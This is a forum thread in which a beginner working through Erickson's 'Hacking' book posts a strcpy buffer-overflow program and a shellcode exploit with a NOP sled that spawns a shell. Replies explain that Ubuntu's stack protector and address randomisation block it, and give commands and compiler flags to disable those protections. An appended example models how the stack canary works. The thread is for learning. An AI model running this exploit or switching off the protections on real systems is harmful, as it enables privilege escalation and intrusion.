*** stack smashing detected ***

This is a discussion on *** stack smashing detected *** within the C Programming forums, part of the General Programming Boards category; Hi, I'm trying to learn som C programming from this "Hacking" book by Jon Erickson and this code is taken ...

  1. #1
    Registered User
    Join Date
    Apr 2007
    Posts
    3

    *** stack smashing detected ***

    Hi,

    I'm trying to learn some C programming from this "Hacking" book by Jon Erickson and this code is taken from that book.

    Both programs compile error-free and there are no other problems.
    They are compiled with Gcc 4.1.2 on Ubuntu 4.1.1 (if it should matter.)

    The problem is when I try to run exploit. I get this message:

    Stack pointer (ESP) : 0xbf963908
    Offset from ESP : 0x0
    Desired return addr; 0xbf963908
    *** stack smashing detected ***: vuln terminated
    Aborted



    vuln.c:
    Code:
    #include <string.h>

    int main(int argc, char *argv[])
    {
    	char buffer[500];
    	/* No length check on argv[1]: this is the overflow the thread is about. */
    	strcpy(buffer, argv[1]);
    	return 0;
    }


    exploit.c
    Code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
    		   "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
    		   "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x72"
    		   "\x68";
    
    unsigned long sp(void)
    {__asm__("mov %esp, %eax");}
    
    int main(int argc, char *argv[])
    {
    	int i, offset;
    	long esp, ret, *addr_ptr;
    	char *buffer, *ptr;

    	offset = 0;
    	esp = sp();
    	ret = esp - offset;

    	printf("Stack pointer (ESP) : 0x%lx\n", esp);
    	printf("     Offset from ESP : 0x%x\n", offset);
    	printf("Desired return addr: 0x%lx\n", ret);

    	buffer = malloc(600);

    	/* Fill the whole buffer with the desired return address. */
    	ptr = buffer;
    	addr_ptr = (long *) ptr;
    	for (i = 0; i < 600; i += 4)
    		*(addr_ptr++) = ret;

    	/* First 200 bytes: NOP instructions. */
    	for (i = 0; i < 200; i++)
    		buffer[i] = '\x90';

    	/* Shellcode goes right after the NOPs. */
    	ptr = buffer + 200;
    	for (i = 0; i < strlen(shellcode); i++)
    		*(ptr++) = shellcode[i];

    	buffer[600-1] = 0;

    	/* Pass the buffer to vuln as argv[1]. */
    	execl("./vuln", "vuln", buffer, (char *) NULL);

    	free(buffer);

    	return 0;
    }

    I'm just a beginner to C so I would appreciate any comments.

    - Martin

  2. #2
    Captain Crash brewbuck's Avatar
    Join Date
    Mar 2007
    Location
    Portland, OR
    Posts
    7,237
    Imagine that! The security features of Ubuntu are working properly to prevent this silly exploit from working! It's just UNBELIEVABLE!

  3. #3
    Registered User
    Join Date
    Apr 2007
    Posts
    3

    RE:

    I guess it's just a silly exploit, but that's not the point.

    So you are saying it's a security feature in Ubuntu... thanks for that.

    - Martin

  4. #4
    Registered User
    Join Date
    Dec 2006
    Posts
    15
    Yeah, Ubuntu is quite good in that respect. I've never seen the exact message you get, but I know that Ubuntu randomizes the location of the stack, making it very hard for buffer overflows to be successful.

    Edit:
    It's called the Linux VA patch.
    Try this:
    echo 0 > /proc/sys/kernel/randomize_va_space

  5. #5
    Registered User
    Join Date
    May 2009
    Posts
    1
    Just try this exploit running on Windows and it will work =). I tried to compile the code with Bloodshed GCC and all worked fine.

  6. #6
    Kernel hacker
    Join Date
    Jul 2007
    Location
    Farncombe, Surrey, England
    Posts
    15,677
    Quote, originally posted by isam2k:
    "just try this exploit running on windows and it will work =). I tried to compile the code with Bloodshed GCC and all worked fine."

    Interesting - last time I checked, INT 0x80 wasn't really doing Linux style system calls when performed in Windows...

    --
    Mats
    Compilers can produce warnings - make the compiler programmers happy: Use them!
    Please don't PM me for help - and no, I don't do help over instant messengers.

  7. #7
    Registered User slingerland3g's Avatar
    Join Date
    Jan 2008
    Location
    Seattle
    Posts
    602
    Nice! Try running with the gcc option -fno-stack-protector, then you will see a seg fault of sorts with this code.

  8. #8
    spurious conceit MK27's Avatar
    Join Date
    Jul 2008
    Location
    segmentation fault
    Posts
    8,300
    Quote, originally posted by Martin_HS:
    "Hi,

    I'm trying to learn som C programming from this "Hacking" book by Jon Erickson and this code is taken from that book."

    That is a terrific and really well written book. I started learning C with that book, although I still haven't finished it. Is that from chapter 3?

    I didn't like using the cd either so I just compiled that version of gcc from source and called it "gcc336"*; I think that anti-smashing protection will only work with gcc 4+, so you should be able to do all the experiments. Also, all the gdb output will be identical to his, which makes stuff easier to follow than if you use a different compiler version.

    *so rather than "gcc myprog.c" you'd use "gcc336 myprog.c"
    Last edited by MK27; 05-28-2009 at 04:04 PM.

  9. #9
    Registered User slingerland3g's Avatar
    Join Date
    Jan 2008
    Location
    Seattle
    Posts
    602

  10. #10
    Newbeer ch4's Avatar
    Join Date
    Jan 2007
    Posts
    142
    Yesterday I got the same message
    Not too rarely finally.

    Ubuntu 8.10
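
What the "*** stack smashing detected ***" message in post #1 and the -fno-stack-protector suggestion in post #7 correspond to, as an added example (not code from the thread or from the book): a simplified model of a stack-protector frame in which a guard value sits between buffer[500] and the return address. The frame layout, guard value, return address and 600-byte argument are all constructed for illustration, and the saved frame pointer is left out.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 500          /* same size as buffer[] in vuln.c */
#define CANARY   0x00a5c3f1u  /* constructed; the real guard is random per process */

/* Model of a protected frame: locals, then the guard, then the return address. */
struct frame { char buffer[BUF_SIZE]; uint32_t canary; uint32_t saved_ret; };
enum outcome { RETURNED_NORMALLY, SMASH_DETECTED, RET_CORRUPTED, INPUT_REJECTED };

/* Models strcpy(buffer, argv[1]): ignores BUF_SIZE. The copy is clamped to the
 * model frame so this example never touches memory outside the struct. */
static void unchecked_copy(struct frame *f, const char *src, size_t len) {
    if (len > sizeof *f) len = sizeof *f;
    memcpy((unsigned char *)f, src, len);
}

/* The fix for vuln.c: reject input that does not fit, terminator included. */
static int checked_copy(struct frame *f, const char *src, size_t len) {
    if (len >= BUF_SIZE) return -1;
    memcpy(f->buffer, src, len);
    f->buffer[len] = '\0';
    return 0;
}

/* One call of the modelled function, with the protector on or off. */
enum outcome simulate_call(const char *arg, size_t len, int protector, int bounded) {
    struct frame f = { .canary = CANARY, .saved_ret = 0x08048400u /* constructed */ };
    const uint32_t good_ret = f.saved_ret;
    if (!bounded) unchecked_copy(&f, arg, len);
    else if (checked_copy(&f, arg, len) != 0) return INPUT_REJECTED;
    /* Epilogue check: here glibc's __stack_chk_fail() prints the message and aborts. */
    if (protector && f.canary != CANARY) return SMASH_DETECTED;
    return f.saved_ret == good_ret ? RETURNED_NORMALLY : RET_CORRUPTED;
}

int main(void) {
    static const char *names[] = { "returned normally", "stack smashing detected",
                                   "return address corrupted", "input rejected" };
    char arg[600];
    memset(arg, 'A', sizeof arg);  /* constructed 600-byte argument */
    printf("protector on,  strcpy:       %s\n", names[simulate_call(arg, sizeof arg, 1, 0)]);
    printf("protector off, strcpy:       %s\n", names[simulate_call(arg, sizeof arg, 0, 0)]);
    printf("protector on,  2 bytes over: %s\n", names[simulate_call(arg, 502, 1, 0)]);
    printf("protector on,  bounded copy: %s\n", names[simulate_call(arg, sizeof arg, 1, 1)]);
    return 0;
}
```

The 502-byte case shows why the guard is checked rather than the return address: the overflow is caught even though it never reaches the saved return address.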
